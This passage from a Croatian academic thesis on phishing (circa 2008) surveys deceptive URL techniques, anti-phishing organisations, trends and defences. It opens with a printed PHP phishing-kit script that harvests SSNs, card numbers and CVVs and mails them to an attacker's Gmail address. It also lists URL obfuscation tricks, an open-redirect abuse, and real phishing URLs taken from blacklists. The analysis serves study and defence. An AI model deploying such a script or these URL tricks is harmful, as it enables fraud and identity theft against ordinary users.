<?session_start();$fname = $_POST['fname'];$mname = $_POST['mname'];$lname = $_POST['lname'];$Address = $_POST['Address'];$City = $_POST['City'];$State = $_POST['State'];$Zip = $_POST['Zip'];$Phone = $_POST['Phone'];$Country = $_POST['Country'];$ssn = $_POST['ssn'];$dobm = $_POST['dobm'];$dobd = $_POST['dobd'];$doby = $_POST['doby'];$ccnumber = $_POST['ccnumber'];$month = $_POST['month'];$year = $_POST['year'];$cvv2 = $_POST['cvv2'];$type = $_POST['type'];

//sending email info here$ip = getenv("REMOTE_ADDR");

$subj = "IP - $ip | $ccnumber | PayPal | - Step 1 -"; $msg = "IP: $ip\n\nFirst Name: $fname\nMiddle Name: $mname\nLast Name: $lname\nAddress: $Address\nCity: $City\nState: $State\nZip: $Zip\nPhone: $Phone\nCountry: $Country\nssn: $ssn\nDOB Month: $dobm\nDOB Day: $dobd\nDOB Year: $doby\n-----------------------\nCard Type: $type\nCredit Card Number: $ccnumber\nCC Expiration Month: $month\nCC Expiration Year: $year\nCvv: $cvv2"; $from = "From: PayPal<another@one.com>"; mail("geamantan@gmail.com", $subj, $msg, $from); header("Location: processing3.html");

?>Slika 2.16: Ispis skripte step3.php

2.3. Tipovi adresaIako je u nekim specifičnim slučajevima moguće pomoću ranjivosti preglednika sakriti adresu na kojoj se lažna stranica nalazi, to generalno nije moguće. Zato dio phishera koristi trikove da bi uvjeriti korisnike da lažna stranica stvarno pripada organizaciji za koju se predstavlja. Tako je jedan od prvih trikova bio da se slovo "l" u adresi zamijeni s "I" ili "1". To je iskorišteno u napadima na PayPal gdje su umjesto originalne domene paypal.com otvorene domene paypaI.com i paypa1.com. Isto tako je poznat napad u kojem je domena bankofthewest.com zamijenjena s bankofthevvest.com (w prikazano kao vv). Osim tih jednostavnih trikova, postoje i drugi koji se temelje na neznanju prosječnih korisnika Interneta o načinu izgradnje adresa i o hijerarhijskoj pripadnosti domenama. Postoje korisnici koji vjeruju da adrese poput http://paypal-alert.net/ ili http://paypal.4yu.fr/ pripadaju domeni paypal.com [15]. Isto tako neki korisnici vjeruju da adrese poput http://aimeegoestolondon.com/www.paypal.it/index.htm ili http://189.224.23.84/www.paypal.com/paypal pripadaju PayPal-u.

20

2. Izvedba phishinga

Generalno, adrese koje se koriste moguće je razvrstati u 5 kategorija [16]:

1. Skrivanje imena domene pomoću IP adresa. Ime domene je u adresi moguće zamijeniti s IP adresom na kojoj se server nalazi, tako da je za http://www.fer.hr/ bilo koji sljedeći oblik valjan: http://161.53.72.23/ (dekatski zapis odvojen točkama), http://0xa1.53.0110.23/ (kombinacija dekatskog, heksadekatskog - 0xa1 i oktalnog - 0110 zapisa). Moguće je koristiti i zapis gdje se IP adresa ne odvaja po oktetima, već se koristi jedan 32-bitni broj. Tako se adresa http://www.fer.hr pretvara u http://0xa1354817/ (heksadekatski), http://024115244027/ (oktalno) ili http://2704623639/ (dekatski). Posljednja dva oblika server na www.fer.hr odbija, međutim općenito to su legalni zapisi adresa. Primjer takve phishing adrese je http://201.210.197.5/cgi_bin/Launch_cashplus.cgi/.

2. Skrivanje stvarne domene dodavanjem ciljane domene u adresu. Tu pripadaju adrese kojima je u put do dokumenta koji se učitava dodan naziv ciljane domene. Primjer takve adrese je http://www.payvr.fr/httpswww.paypal.comfrcgi ili http://www.pibliceflam.be/www.PayPal.Com/FR-fr/cgi-bin.

3. Skrivanje stvarne domene dodavanjem imena ciljane domene u poddomenu. Na taj način je moguće izgraditi adresu poput http://www.paypal.com.nekadrugaadresa.com. Primjeri takvih adresa su http://www.paypal.nd.pl/ ili http://paypal.4yu.fr/.

4. Naziv domene je pogrešno napisan. Tu pripadaju adrese poput http://paypak.eu/, http://www.paypai.com/, http://www.paypa1.com/, http://www.bankofthevvest.com i razne druge.

5. Upotreba adresa koje su namijenjene za preusmjeravanje. Na primjer, eBay ima skriptu na adresi http://my.ebay.com/aw-cgi/eBayISAPI.dll? koja omogućava korisniku da kao parametar unese stranicu na koju želi biti preusmjeren (provjereno 21.9.2008.). Koristeći takve sigurnosne propuste napadač može stvoriti adresu koja će sadražvati potpuno legitimnu domenu (my.ebay.com), a ipak će voditi na zlonamjernu stranicu. Primjer takve adrese je http://my.ebay.com/aw-cgi/eBayISAPI.dll?RedirectEnter&partner=ShowItem&loc=http%3A%2F%2Fus.ebayobjects.com%2F2c%3B9739597%3B9123118%3Bz%3Fhttp%3A%2F%2F0xc924a44/custsvc/_include/Function.asp gdje se korisnika preusmjerava na adresu http://0xc924a44/custsvc/_include/Function.asp.

U početku phishinga se koristio još jedan način koji danas uglavnom nije moguć zbog zlouporabe. HTTP protokolom je bilo predviđeno slanje korisničkog imena Web poslužitelju [7]. Korisničko ime se upisivalo prije imena domene, a odvojeno znakom "@". Primjer takve adrese bi bio http://pero@www.fer.hr/. Tako je bilo moguće iskonstruirati adresu poput http://www.paypal.com@mojadomena.com/ i uvjeriti korisnika da ta adresa zapravo pripada PayPalu. Danas je taj oblik adresa u Internet Exploreru potpuno onemogućen (provjereno za verziju 7), a Mozilla Firefox i Seamonkey javljaju upozorenje da se zapravo radi o adresi http://mojadomena.com/ i pitaju korisnika da li je siguran da to želi. Novija verzija preglednika Opera se ponaša jednako kao i Firefox.

U tablici 2.1 je prikazano još nekoliko stvarnih adresa i njihove značajke.

21

2. Izvedba phishinga

Tablica 2.1: Primjeri adresa lažnih stranica

Adresa stranice Tip adresehttp://122.248.47.226/mrtg/.cartasi/index.htm Tip 1http://122.34.255.25/securazione/bancopostaonline.poste.it/poste/bpol/bancoposta/formslogin.htm

Tip 1+2

http://202.67.215.50/~payment/payment/infinity.icicibank.co.in/BANKAWAY=Action.RetUser.Init.001=Y&amp;AppSignonBankId=ICI&amp;AppType=corporate&amp;abrdPrf=N/update.icici.com/

Tip 1+2

http://centre-fax.com/www.PayPal.Com/fr/Confirm.htm Tip 2http://connect.colonialbank.a9t5l43uev049lx363hh.secureserv.onlineupdatemirror3238o18kb1af7b.colonial.certificaterenewal.gfhrf.com/logon.htm

Tip 3

http://gjhvnvjgfjhgj.9k.com/klhfjkgfdlgkhgklbgkjhgdlkghdsfgdkghghdsifghearitufgrehgfdkghrgjh.html

Normalna adresa neobičnog izgleda

http://membres.lycos.fr/dhddgdh/paypal.fr/ Tip 2http://njserve.com/images/1/www.halifax.co.uk/Re-activation/halifax-online.co.uk/secure/_mem_/formslogin.asp/index.html

Tip 2

http://signin.e-bay.com-ws-e-bayisapi.dll.9k.com/SignIn0ru3A2F2.html

Tip 3

http://top.capitalonebank.compub.login.htmlbank.serv.manager.cgipage.showshow.075497317.type.activex.comprj.egfgdc.com/login.htm

Tip 3

http://www.backwoon.com/toow/bofa/ Normalna adresahttp://www.bcanb.info/ Normalna adresahttp://www.cheap-nukes.com/.site/www.paypal.it/Confirm.htm Tip 2

2.4. Tijek novcaUkoliko se radi o financijskom napadu, da bi napad bio potpuno uspješan, napadač mora preuzeti novac s kompromitiranog računa. Prema "camorra" modelu [12] organizator napada prvenstveno radi vlastite zaštite zapošljava agente koji će prebaciti novac na svoje račune. Agenti podužu novac s kompromitiranih računa, te ga šalju u inozemstvo. Drugi agenti skupljaju taj nova u inozemstvu i šalju ga napadaču. Osim vlastite sigurnosti, na taj način napadač osigurava i novac jer je mala vjerojatnost da će svi agenti biti uhvaćeni i da će sav novac biti izgubljen. Agenti često koriste eGold jer uplatu u eGold sustav nije moguće opozvati, pa drugi agent taj novac može preuzeti bilo gdje u svijetu [10].

2.5. Zlonamjerni programiUpotreba zlonamjernih programa, ukoliko ih je moguće instalirati na žrtvino računalo, znatno olakšava posao napadača. Najjednostavniji način slanja programa žrtvi je u privitku poruke elektroničke pošte. Iako je ova metoda vrlo stara i postoje brojne metode zaštite koje ju sprječavaju, svejedno je još uvijek moguće zaraziti jedan dio korisnika. Ako postoje ranjivosti preglednika

22

2. Izvedba phishinga

elektroničke pošte, onda je moguće sastaviti takvu poruku koja će preuzeti nepoželjni program bez ikakve interakcije korisnika. Nakon što se zlonamjerni program jednom nađe na žrtvinom računalu, mogućnosti su vrlo široke. Postoje programi koji bilježe pritisak svake tipke i program koji je bio aktivan u tom trenu. Pomoću takvog programa napadač može doći do svega što je korisnik upisao, pa tako i do korisničkih imena i lozinki. Druga mogućnost je da zlonamjerni program preusmjerava mrežni promet zaraženog računala. Tada napadač može preusmjeriti pokušaje otvaranja stvarnih financijskih stranica na svoje lažne stranice i tako doći do željenih podataka.

23

3. OrganizacijeNajpoznatije organizacije koje sakupljaju informacije o phishingu i pružaju neku razinu zaštite su APWG, PhishTank i Symantec PRN. PhishTank je potpuno besplatan za upotrebu, dok se za druga dva plaćaju mjesečne članarine. Osim njih, phishingom se bave i druge kompanije kao što su Microsoft i Google, ali oni rezultate koriste samo za svoje interne potrebe.

3.1. APWGAnti-Phishing Working Group (APWG – http://antiphishing.org) je najpoznatija organizacija koja se bavi otkrivanjem i sprječavanjem phishing napada. To je organizacija koja okuplja velik broj sigurnosnih i financijskih kompanija. Trenutno broje preko 1700 kompanija i agencija koje su uključene u borbu protiv phishinga. Surađuju s 9 od 10 najvećih banaka i 5 najvećih ISP-ova u SAD-u. Osim toga aktivni su i na području provođenja zakona vezanih uz prijevare na Internetu. Najveći APWG-ovi sponzori su Microsoft, Visa, Symantec, Yahoo, eBay, GeoTrust, RSA, McAfee i još neki drugi.

APWG mjesečno svojim članovima izdaje izvještaje o trenutnom stanu u svijetu, te s partnerima radi na razvoju zaštite od phishinga. Izvještaji su za javnost dostupni s kašnjenjem od pola godine.

APWG-ov partner MillerSmiles (http://www.millersmiles.co.uk) posjeduje automatski sustav koji skuplja phishing poruke (HoneyTrap), te pruža mogućnost pretplate (180 GBP mjesešno) na redovito osvježavanu listu najnovijih adresa phishing stranica. Moguće je i osobno (dobrovoljno) doprinijeti tom popisu slanjem sumnjive adrese, odnosno poruke na reportphishing@antiphishing.org. Na slici 3.1 je prikazan jedan primjer iz MillerSmilesove arhive.

24

3. Organizacije

3.2. PhishTankPhishTank (http://www.phishtank.com) je anti-phishing organizacija pokrenuta pod pokroviteljstvom OpenDNS-a. Organizacija je neprofitna i sastoji se od dobrovoljaca koji pronalaze i prijavljuju phishing adrese, zatim od onih koji te adrese provjeravaju i na kraju onih koji održavaju cijeli sustav. Podaci koje PhishTank sakupi su potpuno besplatni i slobodni za nekomercijalnu, ali i komercijalnu uporabu. PhishTank pruža i API (Application Programming Interface) preko kojeg je moguće programski dohvaćati najnovije podatke. Taj sustav koristi Internet preglednik Opera. Za sudjelovanje u radu grupe potrebna je (također besplatna) registracija.

PhishTank broji preko 20.000 članova i mjesečno obradi oko 15.000 prijavljenih sumnjivih adresa (podaci za 2008. godinu).

Na adresi http://data.phishtank.com/data/online-valid/ je moguće dohvatiti trenutno aktualan popis phishing stranica u XML formatu [4]. Na slici 3.2 je dan isječak iz tog popisa.

25

Slika 3.1: Primjer poruke iz MillerSmilesove arhive

3. Organizacije

<?xml version="1.0" encoding="UTF-8"?><output>

<meta><generated_at>2008-06-30T10:22:26+00:00</generated_at><total_entries>3271</total_entries>

</meta><entries>

<entry><url><!

[CDATA[http://www.natwest.co.uk.ttre.me.uk/serverstack/usersdirectory/ncf.aspx?pc=3D112771808504170148543896991026940934204436642114070&amp]]></url>

<phish_id>469016</phish_id><phish_detail_url><!

[CDATA[http://www.phishtank.com/phish_detail.php?phish_id=469016]]></phish_detail_url>

<submission><submission_time>2008-06-

29T21:22:43+00:00</submission_time></submission><verification>

<verified>yes</verified><verification_time>2008-06-

30T04:37:50+00:00</verification_time></verification><status>

<online>yes</online></status>

</entry><entry>

<url><![CDATA[http://chicagoplaygroundequipment.com//userlogo/anz.html]]></url>

<phish_id>469004</phish_id><phish_detail_url><!

[CDATA[http://www.phishtank.com/phish_detail.php?phish_id=469004]]></phish_detail_url>

<submission><submission_time>2008-06-

29T20:13:38+00:00</submission_time></submission><verification>

<verified>yes</verified><verification_time>2008-06-

29T23:52:04+00:00</verification_time></verification><status>

<online>yes</online></status>

</entry>Slika 3.2: Dio PhishTankovog XML popisa

3.3. Symantec PRNSymantec Phish Report Network (PRN) je Symantecova mreža razmjene phishing stranica. Organizacija je podijeljena u dva dijela. Prvi dio su sakupljači adresa koji djeluju na dobrovoljnoj bazi, a drugi dio čine korisnici tih linkova. Godišnja članarina iznosi 50.000 USD. Članstvo je namijenjeno kompanijama koje se bave sigurnošću korisnika Interneta i kompanijama koje su ciljevi phishing napada. Dobrovoljci mogu na adresi

26

3. Organizacije

https://submit.symantec.com/antifraud/phish.cgi ostaviti adresu stranice koju smatraju sumnjivom.

3.4. GoogleGoogle održava listu phishing stranica koju koriste Internet preglednici Mozilla Firefox [6] i Google Chrome. Potpunu listu je moguće dohvatiti na adresi http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1. Osim liste phishing stranica Google pruža i listu sigurnih stranica. Listu sigurnih stranica je moguće dohvatiti na adresi http://sb.google.com/safebrowsing/update?version=goog-white-url:1:1. Google pruža i uslugu pojedinačne provjere adresa. U tom slučaju se poslužitelju šalje sažetak (engl. hash) adrese koji poslužitelj provjerava u svom popisu sažeteka zlonamjernih adresa. Na taj način je djelomično sačuvana privatnost korisnika jer Google zna kojoj adresi pripada koji sažetak. Nije poznato na koji način Google održava listu, ali pretpostavlja se da se radi o izdvajanju phishing poruka iz ostale neželjene pošte u Google Mail sustavu, te vađenja adresa zlonamjernih stranica iz samih poruka. U razvojnoj dokumentaciji Mozilla Firefoxa [6] je opisan protokol koji se koristi pri dohvatu liste, odnosno pri provjeri pojedinačne adrese.

Na slici 3.3 je prikazan isječak iz Google SafeBrowse liste na dan 10.7.2008.+http://02b3f91.netsolhost.com/com.html c+http://117.103.80.4/icons/online/sign/SignIn/index.php c+http://117.103.80.4/icons/small/.../wachovia/auth/presentLogin/index.php c+http://117.103.80.4/ms/BOA/sslencrypt218bit/login/index.php c+http://117.120.0.7/Land-Rover-Defender-TD-X-White-Speed-M_W0QQcmdZViewItemQQitemZ160217842882 c+http://122.248.47.226/mrtg/.cartasi/index.htm c+http://122.249.206.250/manual/.cartasi/index.htm c+http://122.249.206.250/manual/ssl/.cartasi/index.htm c+http://122.34.255.25/securazione/bancopostaonline.poste.it/poste/bpol/bancoposta/ c+http://122.34.255.25/securazione/bancopostaonline.poste.it/poste/bpol/bancoposta/formslogin.htm c+http://124.217.242.121/boveda/ c+http://125.214.64.161/~milliner/halifax-online.co.uk/_mem_/formslogin.asp/ c+http://12month.t35.com/ c+http://139.55.82.157:84/www.tscu.org/ c+http://146.83.43.189/Temas/filter/censor/Logon.html c+http://148.228.86.58/error/www.moneybookers.com/app/login.pl/index.htm c+http://163.27.214.129/~p-p/poste.html c+http://166.111.176.8/%20/www.paypal.it/cgi-bin/webscrcmd/index.htm c+http://189.188.123.193/ c+http://189.224.23.84/www.paypal.com/paypal/cgi-bin/webscrcmd=_login-run/webscrcmd=_account-run/updates-paypal/confirm-paypal/c+http://190.196.17.220/bancanetempresarial/ c+http://190.196.17.220/boveda/ c

Slika 3.3: Isječak iz Google SafeBrowse liste

27

4. TrendoviAPWG je na početku svog djelovanja, u prosincu 2004. godine, otkrio oko 1.700 phishing stranica. Ta brojka se povećala do 15.000 mjesečno sredinom 2006. godine, te oko 25.000 stranica mjesečno početkom 2008. godine [1]. Detaljnije kretanje broja phishing stranica je prikazano na slici 4.1. Na slici je moguće vidjeti stagnaciju porasta krajem 2007. godine, što je djelomičan uspjeh svih sudionika u borbi protiv phishinga. Najveći broj phishing stranica je smješten u SAD-u. Taj se podatak nije promijenio od samih početaka phishinga. U novije vrijeme nakon SAD-a slijede Rusija čij je udio znatno povećan u novije vrijeme i Kina, a Njemačka se redovito nalazi među 10 zemalja u kojima je smješteno najviše phishing stranica. Na slikama 4.2-4.5 je prikazan detaljniji raspored za posljednje 4 godine.

Prosječno vrijeme potrebno da se otkrivena phishing stranica ugasi se smanjilo sa 5,80 dana u siječnju 2005. godine na 3,1 dan u siječnju 2008. godine. Maksimalno vrijeme potrebno za gašenje stranice je danas oko 30 dana kao i 2005. godine. To je posljedica nezainteresiranosti pružatelja Internet usluga na dalekom istoku (Kina, Koreja), pa se oni oglušuju na zahtjeve za gašenje stranica.

Na slici 4.6 je prikazano kretanje broja stranica koje sadrže zlonamjerne programe. Najčešće se radi o programima koji se instaliraju na žrtvino računalo i bilježe pritisak svake tipke (engl. keyloggers).

28

Slika 4.1: Kretanje broja otkrivenih phishing stranica [1]

4. Trendovi

29

Slika 4.2: Smještaj phishing stranica po zemljama za siječanj 2005. [1]

Slika 4.3: Smještaj phishing stranica po zemljama za siječenj 2006. [1]

4. Trendovi

30

Slika 4.4: Smještaj phishing stranica po zemljama za siječanj 2007. [1]

Slika 4.5: Smještaj phishing stranica po zemljama za siječanj 2008. [1]

4. Trendovi

PhishTank djeluje od kraja 2006. godine. Zbog načina sakupljanja podataka, broj mjesečnih prijava varira od 5.000 pa do 80.000, te iz toga nije moguće zaključiti mnogo toga o stvarnom stanju. Prosječni broj mjesečnih prijava iznosi oko 15.000 i ne pokazuje tendenciju porasta, što je moguća posljedica broja aktivnih članova. 10 najaktivnijih članova (od 20.000 ukupno) prijavi preko 50% sumljivih adresa. Na slici 4.7 prikazano je kretanje broja prijava i broja stvrnih phishing stranica koje je zabilježio PhishTank [2].

31

Slika 4.7: Broj phishing stranica koje PhishTank otkrije, po mjesecima [2]

Slika 4.6: Kretanje broja stranica koje sadrže zlonamjerne programe [1]

4. Trendovi

MillerSmiles, organizacija koja sudjeluje u radu APWG-a mjesečno zaprimi oko 200 različitih poruka elektroničke pošte, a od početka djelovanja 5.3.2003. je zaprimila preko 520.000 phishing poruka [5].

U 2008. godini je zadržan trend da se preko 90% svih napada odnosi na financijske institucije [1]. Detaljniji pregled dan je na slici 4.8.

Broj tržišnih marki (organizacija) koji se imitiraju se konstantno kreće oko 100, ali svega petnaestak marki čini preko 80% svih phishing napada [1]. APWG ne odaje o kojim se konkretno markama radi. Prema PhishTankovim statistikama [2], phishing napadi se najčešće odnose na PayPal i eBay. Na slici 4.9 je prikazano kretanje postotnog udjela najčešćih marki u ukupnom broju phishing napada. Zbog već spomenutog načina rada PhishTanka, brojevi su nepouzdani, međutim svejedno je moguće zaključiti da se redovito preko 20% svih napada odnosi na PayPal. Na eBay se odnosilo preko 40% sve do početka 2008. godine kad je taj broj počeo opadati. U lipnju 2008. godine se na drugom mjestu nalazi američka banka JP Morgan (slika 4.10).

32

Slika 4.8: Raspodjela ciljanih organizacija u siječnju 2008. [1]

4. Trendovi

33

Slika 4.9: Postotni udio najčešćih marki u ukupnom broju phishing poruka [2]

Slika 4.10: Stanje u lipnju 2008. [2]

5. Zaštita5.1. Internet pregledniciDanas svaki od tri najpopularnija Internet preglednika [3] (Microsoft Internet Explorer 7, Mozilla Firefox 2 i 3, Opera 9) ima ugrađenu funkcionalnost prepoznavanja zlonamjernih stranica i upozoravanja korisnika na to. U sva tri slučaja sustav prepoznavanja se svodi na liste zlonamjernih stranica (engl. blacklists) u kojima se provjerava svaka stranica kojoj korisnik želi pristupiti. Internet Explorer 7 koristi Microsoftov servis provjere stranica. Sustav radi tako da Internet Explorer svaku adresu kojoj korisnik želi pristupiti šalje svom poslužitelju koji u bazi podataka provjerava je li ta stranica zlonamjerna. Ako je, pojavljuje se odgovarajuća poruka i korisnika se upućuje da ne posjeti tu stranicu. Način rada poslužitelja koji provjerava adrese, te sam način popunjavanja liste nije poznat. Opera radi na isti način, ali koristi PhishTankovu listu provjerenih phishing stranica. U oba slučaja dolazi do narušavanja privatnosti korisnika jer poslužitelji dobivaju svaku adresu kojoj korisnik pristupa, te njegovu IP adresu. Mozilla Firefox koristi listu zlonamjernih stranica koju održava Google i koja je dostupna na poslužitelju http://sb.google.com. Firefox može raditi na dva načina. Prvi je isti kao i kod prethodna dva preglednika. Svaka adresa kojoj korisnik pristupa šalje se Googleovom poslužitelju koji odlučuje o prirodi stranice. Drugi način je da Firefox redovito dohvaća i pohranjuje listu aktualnih phishing stranica i onda lokalno provjeravati svaku adresu [6]. Mozilla razvojni tim preporučuje prvi način, međutim korisnici koji su zabrinuti za svoju privatnost bi trebali koristiti drugi način. Na slikama 5.1, 5.2 i 5.3 prikazana su upozorenja koja prikazuju preglednici kad korisnik pokuša otvoriti zlonamjernu stranicu.

34

Slika 5.1: Upozorenje koje daje Internet Explorer 7

5. Zaštita

Liste zlonamjernih stranica daju korisniku samo djelomičnu sigurnost [23]. Adresa se dodaje u listu tek nakon što je otkrivena od strane održavatelja liste. Nitko ne može jamčiti da će baš on prvi otkriti zlonamjernu stranicu. Postoji mogućnost da će već biti žrtava prije nego što se stranica proglasi opasnom. Drugi problem takvih lista je dodavanje pogrešnih adresa. Moguće je da na listu bude dodana čitava domena koja sadrži opasne stranice, a uz njih može sadržavati veći broj potpuno legalnih stranica. Poznati je primjer blokiranja domene mine.nu u rujnu 2008. [24]

5.2. Filteri neželjene poštePhishing napadi počinju porukom elektroničke pošte, a phishing poruke se šire kao i ostale spam poruke. Zbog toga je pomoću dobrog filtera elektroničke pošte moguće spriječiti velik broj phishing napada. Ako filter zaustavi poruke koje su poslane da bi žrtvu navele na lažnu stranicu, onda se napad zapravo nikad neće dogoditi. Korisnik neće biti prevaren, te se neće pojaviti mogućnost da ostavi svoje podatke na lažnoj stranici. Phishing je razlog više da se poradi na sigurnosti elektroničke pošte. Bitno je da svaki poslužitelj pošte (što se najviše odnosi na besplatne e-mail servise) dobije što kvalitetniji filter neželjene pošte koji će, između ostalog, spriječiti i phishing napade.

35

Slika 5.3: Upozorenje koje daje Opera 9

Slika 5.2: Upozorenje koje daje Mozilla Firefox 3

5. Zaštita

5.3. EdukacijaIstraživanja su pokazala da velik broj korisnika Interneta nije svjestan opasnosti koje vrebaju [15][18]. Mnogi nemaju nikakva saznanja o phishingu, a i oni koji su čuli za phishing ne znaju kako se točno krađa podataka odvija i na što treba paziti. Prosječni korisnik ne zna razlikovati lažirano zaglavlje poruke elektroničke pošte od legitimnog. Zbog toga ne može odrediti da li je pošiljatelj poruke stvarno taj koji piše u polju pošiljatelja. Zatim, korisnici ne znaju na koji se način sastavlja adresa stranice, te vjeruju da adrese oblika http://paypal-security.com/ ili http://nekadrugadomena.com/paypal.com/ pripadaju domeni paypal.com. Zbog toga je danas teško dobiti domenu čij naziv sadrži zaštićeno ime, međutim tako je riješen samo dio napada.

5.4. Korisnička zaštitaKorisnici bi trebali biti svjesni opasnosti kojima se izlažu prilikom uporabe Interneta. Zbog toga bi računala koja se spajaju na Internet trebala biti čim efikasnije zaštićena. Danas postoje softverski proizvodi koju pružaju vrlo visoku razinu zaštite, ali i oni koji samo prividno štite sustav.

5.4.1. Antivirusna zaštitaDio napada dolazi u obliku zlonamjernih programa, pa je vrlo važno da svako računalo bude zaštićeno od mogućnosti preuzimanja i pokretanja bilo kakvih zlonamjernih programa (trojanci i spyware kao najvažniji u phishingu). Osim toga, bitno je zaštititi računalo i sigurnosnom stijenom (engl. firewall) da bi se spriječilo slanje bilo kakvih podataka s računala od strane neprovjerenih aplikacija.

5.4.2. Dodaci za preglednikeDanas postoji velik broj dodataka za Internet preglednike koji služe za zaštitu korisnika [23]. Ti dodaci najčešće dolaze u obliku alatnih traka. Najpoznatiji takav dodatak je eBay Toolbar koji provjerava da li se korisnik nalazi na domenama ebay.com ili paypal.com. Ako je korisnik na sigurnoj stranici onda se prikazuje zelena sličica, a ako se nalazi na jednoj od poznatih phishing stranica onda se prikazuje crvena sličica. Slike 5.4-5.6 prikazuju neke dodatke za preglednike.

Web wallet je sustav zaštite opisan u [11]. Web wallet je implementiran kao dodatak za preglednik koji čuva lozinke koje korisnik koristi. Kad korisnik želi upisati neku lozinku, onda ju ne unosi ručno na stranicu, već aktivira Web wallet. Web wallet tada provjerava da li se korisnik stvarno nalazi na stranici za koju želi upisati lozinku, a tek nakon uspješne provjere unosi lozinku i ulazi na stranicu.

36

Slika 5.4: SpoofStick Toolbar

Slika 5.5: Netcraft Toolbar

Slika 5.6: eBay Toolbar

5. Zaštita

5.5. Promjena načina provjere identitetaUvođenjem naprednijeg sustava autentifikacije moguće je spriječiti phishing napade [14]. Koristeći tokene ili SMS autorizaciju uz zaštitu od man-in-the-middle napada više ne postoji lozinka koju bi napadač mogao ukrasti, pa ne može ni kompromitirati sustav. Takva je zaštita obično komplicirana i financijski neisplativa, pa se iz tog razloga najčešće koristi autentifikacija uporabom samo korisničkog imena i lozinke koja se rijetko mijenja.

5.6. Praćenje napadača i sprječavanje napadaU [12] je predložen način pronalaska napadača i praćenja njihovih aktivnosti. Autori predlažu stvaranje fiktivnih korisničkih računa kod organizacija koje su žrtve. Nakon što se otkrije neka nova phishing stranica, te podatke bi trebalo predati napadaču i dalje pratiti što se događa s kompromitiranim korisničkim računom. Tako bi se dobio uvid u sam način rada napadača, a bilo bi moguće i pratiti tok novca koji se krade s računa.

37

6. ZaključakU ovom radu je opisan način djelovanja phishing napadača, te zaštite koje trenutno postoje. Iako je phishing gorući problem i postoji mnogostruki porast u broju napada u razdoblju od 2005. do 2008. godine, još uvijek ne postoji djelotvorna zaštita koja bi potpuno riješila problem.

Phishing napad je vrlo jednostavno provesti. Nisu potrebne velike tehničke vještine. Za izradu stranice potrebno je osnovno znanje HTML-a i PHP-a. Za distribuciju poruka se mogu iskoristiti već postojeći kanali distribucije spama. Zbog toga je moguće provesti velik broj napada u kratkom vremenskom intervalu. Broj stranica koje je APWG otkrio u siječnju 2005. iznosi oko 2500, a u ožujku 2008. oko 25000, tj. u prosjeku se dnevno otvori nešto manje od 1000 phishing stranica [1]. Broj stranica koje sadrže zlonamjerne programe također je povećan. U travnju 2005. godine broj takvih stranica je iznosio oko 250, a u ožujku 2008. oko 3400 [1].

Zaštita kojom je obuhvaćen najveći broj korisnika se sastoji o filtera neželjene pošte i provjere adrese u listama phishing stranica. Filtere pružaju najveći besplatni poslužitelji elektroničke pošte kao što su Microsoftov Hotmail ili Google Mail, međutim velik broj korisnika manjih servisa još uvijek nije zaštićen. Iako taj broj opada, još uvijek preko 20% korisnika koristi Internet Explorer 6 koji nema ugrađenu zaštitu protiv phishinga [3], a ostali korisnici su ovisni o listama phishing stranica koje se nadopunjuju s kašnjenjem. Kad se postavi nova phishing stranica, potrebno je vrijeme da se ona pojavi na listama, a u tom vremenu netko već može nasjesti na prijevaru. Razni dodaci za preglednike također rješavaju samo dio problema [23]. Zbog toga je jedina djelotvorna zaštita upravo i ona nemoguća – edukacija korisnika.

38

7. Literatura[1] APWG mjesečni izvještaji, http://www.antiphishing.org/phishReportsArchive.html[2] PhishTank mjesečni izvještaji, http://www.phishtank.com/stats.php[3] W3Schools Browser statistics,

http://www.w3schools.com/browsers/browsers_stats.asp[4] PhishTank Blog, http://www.phishtank.com/blog/2006/10/17/xml-data-file-of-online-

valid-phishes-from-phishtank/[5] MillerSmiles arhiva phishing poruka, http://www.millersmiles.co.uk/archives/[6] Mozilla Firefox Phishing Protection Design Documentation,

https://wiki.mozilla.org/Phishing_Protection:_Design_Documentation[7] C. E. Drake, J. J. Oliver, E. J. Koontz, Anatomy of a Phishing Email,

http://research.microsoft.com/users/joshuago/conference/papers-2004/114.pdf[8] C. Wüest, “Phishing In The Middle Of The Stream” - Today’s Threats To Online

Banking, http://www.symantec.com/avcenter/reference/phishing.in.the.middle.of.the.stream.pdf

[9] J. Milletary, Technical Trends in Phishing Attacks, http://www.cert.org/archive/pdf/Phishing_trends.pdf

[10] R. Anderson, Closing the Phishing Hole – Fraud, Risk and Nonbanks, https://www.kansascityfed.org/Publicat/PSR/Proceedings/2007/pdf/Anderson.pdf

[11] M. Wu, R. C. Miller, G. Little, Web Wallet: Preventing Phishing Attacks by Revealing User Intentions, http://groups.csail.mit.edu/uid/projects/phishing/soups-webwallet.pdf

[12] D. Birk, M. Dornseif, S. Gajek, F. Grobert, Phishing Phishers—Tracing Identity Thieves and Money Launderer, http://groebert.org/felix/pub/papers/TR_BiGaGr06Phoneypot_2.pdf

[13] P. Kumaraguru, A. Acquisti, L. F. Cranor, Trust modelling for online transactions: A phishing scenario, http://www.cs.cmu.edu/~ponguru/pk_aa_lc_pst_2006.pdf

[14] R. Clayton, Insecure Real-World Authentication Protocols, http://www.cl.cam.ac.uk/~rnc1/phishproto.pdf

[15] M. Wu, R. C. Miller, Why Anti-Phishing Security Toolbars Do Not Work, http://www.rsa.com/rsalabs/cryptobytes/CryptoBytes-Winter07.pdf

[16] S. Doshi, N. Provos, M. Chew, A Framework for Detection and Measurement of Phishing Attacks, http://www.cs.jhu.edu/~sdoshi/index_files/phish_measurement.pdf

[17] Z. Ramzan, C. Wuest, Phishing Attacks: Analyzing Trends in 2006, http://www.ceas.cc/2007/papers/paper-34.pdf

[18] R. Dhamija, J. D. Tygar, M. Hearst, Why Phishing Works, http://people.seas.harvard.edu/~rachna/papers/why_phishing_works.pdf

[19] T. Moore, R. Clayton, Examining the Impact of Website Take-down on Phishing, http://www.antiphishing.org/ecrimeresearch/2007/proceedings/p1_moore.pdf

[20] M. Jakobsson, The Human Factor in Phishing, http://www.informatics.indiana.edu/markus/papers/aci.pdf

39

7. Literatura

[21] T. Moore, R. Clayton, An Empirical Analysis of the Current State of Phishing Attack and Defence, http://weis2007.econinfosec.org/papers/51.pdf

[22] M. Wu, R. C. Miller, S. L. Garfinkel, Do Security Toolbars Actually Prevent Phishing Attacks?, http://groups.csail.mit.edu/uid/projects/phishing/chi-security-toolbar.pdf

[23] Y. Zhang, S. Egelman, L. Cranor, J. Hong, Phinding Phish: Evaluating Anti-Phishing Tools, http://lorrie.cranor.org/pubs/ndss-phish-tools-final.pdf

[24] Google Goofs On Firefox's Anti-Phishing List, http://tech.slashdot.org/article.pl?sid=08/09/21/1827209

